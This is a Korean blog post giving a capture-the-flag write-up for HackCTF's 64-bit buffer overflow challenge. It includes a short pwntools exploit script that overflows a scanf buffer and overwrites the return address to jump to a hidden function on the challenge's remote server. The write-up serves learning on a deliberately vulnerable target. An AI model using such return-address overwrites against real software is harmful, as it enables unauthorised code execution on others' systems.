[HackCTF : Pwnable] x64 Buffer Overflow 풀이 (64bit, BOF)

WAR GAME/HackCTF

[HackCTF : Pwnable] x64 Buffer Overflow 풀이 (64bit, BOF)

jir4vvit 2021. 3. 5. 18:53

문제 풀이 환경 : ubuntu 16.04
사용 툴 : IDA 7.5 pro

Analysis

대놓고 scanf에서 BOF가 터진다.

How to exploit

payload = dummy + SFP + RET

RET를 callMeMaybe 함수로 덮는다!

Let's exploit

from pwn import *

#p = process('64bof_basic')
p = remote('ctf.j0n9hyun.xyz', 3004)
e = ELF('./64bof_basic')

callMeMaybe = 0x400606

payload = ''
payload += 'A' * 272 
payload += 'BBBBBBBB' # SFP
payload += p64(callMeMaybe) # RET

p.sendline(payload)

p.interactive()

이런건 이제 (매우 과장해서) 1분컷 할 수 있다.

저작자표시 비영리

'WAR GAME > HackCTF' 카테고리의 다른 글

[HackCTF : Pwnable] Simple_Overflow_ver_2 풀이 (32bit, shellcode) (0)	2021.03.09
[HackCTF : Pwnable] x64 Simple_size_BOF 풀이 (64bit, shellcode) (0)	2021.03.09
[HackCTF : Pwnable] 내 버퍼가 흘러넘친다!!! 풀이 (32bit, ROP) (0)	2021.03.05
[HackCTF : Pwnable] 내 버퍼가 흘러넘친다!!! 풀이 (shellcode) (0)	2021.03.04
[HackCTF : Pwnable] Basic_FSB 풀이 (32bit, FSB) (0)	2021.03.04

현재글[HackCTF : Pwnable] x64 Buffer Overflow 풀이 (64bit, BOF)

안녕하세요. JiR4Vvit (jir4vvit, jiravvit, jirabbit05 )입니다. 이 블로그는 해킹공부하는 블로그 입니다.

64bit, 보스세미나했던거정리, FTZ, 리버싱, level30, pwnable, rop, Nebula, dreamhack, Level12, Shellcode, hackctf, JiR4Vvit, BOF, FSB, BANDiT, Level20, Level7, kernel, level4,

Github

Today :
Yesterday :

일	월	화	수	목	금	토
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31

JiR4Vvit의 블로그

[HackCTF : Pwnable] x64 Buffer Overflow 풀이 (64bit, BOF)

Analysis

How to exploit

Let's exploit

'WAR GAME > HackCTF' 카테고리의 다른 글

'WAR GAME/HackCTF'의 다른글

티스토리툴바

[HackCTF : Pwnable] x64 Buffer Overflow 풀이 (64bit, BOF)

Analysis

How to exploit

Let's exploit

'WAR GAME > HackCTF' 카테고리의 다른 글

'WAR GAME/HackCTF'의 다른글

관련글

티스토리툴바